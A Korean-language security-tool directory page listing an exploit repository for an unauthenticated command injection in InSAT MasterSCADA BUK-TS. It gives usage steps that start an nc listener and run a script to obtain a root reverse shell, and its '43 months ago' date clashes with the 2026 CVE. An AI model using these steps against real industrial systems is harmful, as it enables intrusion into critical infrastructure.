Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ — InSAT MasterSCADA BUK-TS MMadmServ 웹 인터페이스에 대한 인증되지 않은 OS 명령 삽입 익스플로잇. HTTP POST 요청을 통해 루트 권한으로 리버스 셸을 전달합니다. CVSS 9.8 심각. | Kitploit
도구/GitHubGitHub/mbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv
Payload GenerationExploitationSCADA/ICS SecurityWeb Application ExploitationPenetration TestingCommand and Control
GitHubmbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv

CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ

InSAT MasterSCADA BUK-TS MMadmServ 웹 인터페이스에 대한 인증되지 않은 OS 명령 삽입 익스플로잇. HTTP POST 요청을 통해 루트 권한으로 리버스 셸을 전달합니다. CVSS 9.8 심각.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
43개월 전아직 검토되지 않음

CVE-2026-22553 Python License Author

InSAT MasterSCADA BUK-TS - 인증되지 않은 RCE

CVE-2026-22553 | CVSS 9.8 심각| 익스플로잇 작성자: Mohammed Idrees Banyamer


📝 설명

InSAT MasterSCADA BUK-TS는 MMadmServ 웹 인터페이스에서 인증되지 않은 OS 명령 삽입 취약점이 존재합니다. 이 결함으로 인해 원격 공격자는 인증 없이 **완전한 원격 코드 실행(RCE)**을 달성할 수 있습니다.

  • 영향을 받는 제품: InSAT MasterSCADA BUK-TS (모든 버전)
  • 취약점 유형: OS 명령 삽입 (CWE-78)
  • 심각도: 심각 (CVSS v3.1 점수: 9.8)
  • 익스플로잇 작성자: Mohammed Idrees Banyamer
  • 국가: 요르단 🇯🇴

🛠️ 공격 방법 다이어그램

root@kitploit:~
flowchart TD
    A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
    B -->|Unauthenticated| C[Vulnerable Parameter]
    C -->|OS Command Injection| D[Command Execution on Target Server]
    D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
    
    style A fill:#ff4d4d,stroke:#fff
    style E fill:#4dff88,stroke:#fff

🚀 사용법

root@kitploit:~
python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>

예시

root@kitploit:~
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444

옵션

옵션설명
target대상 URL (예: http://ip:port)
--lhost사용자 IP 주소 (리버스 셸)
--lport사용자 리스닝 포트

📌 사용 방법

  1. 사용자 머신에서 리스너를 시작하세요:

    root@kitploit:~
    nc -lvnp 4444
    
  2. 익스플로잇을 실행하세요:

    root@kitploit:~
    python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
    
  3. root/시스템 권한으로 리버스 셸을 획득하세요.


⚠️ 면책 조항

이 익스플로잇은 교육 및 승인된 모의 침투 테스트 목적으로만 제공됩니다.
소유하지 않은 시스템에 무단 사용하는 것은 불법이며, 국제법을 위반할 수 있습니다.
작성자는 불법 사용에 대한 책임을 지지 않습니다.


📬 작성자

Mohammed Idrees Banyamer

  • Instagram: @banyamer_security
  • GitHub: mbanyamer
  • 국가: 요르단 🇯🇴

이 저장소가 유용하다면 ⭐ 스타를 눌러주세요!

도구 다운로드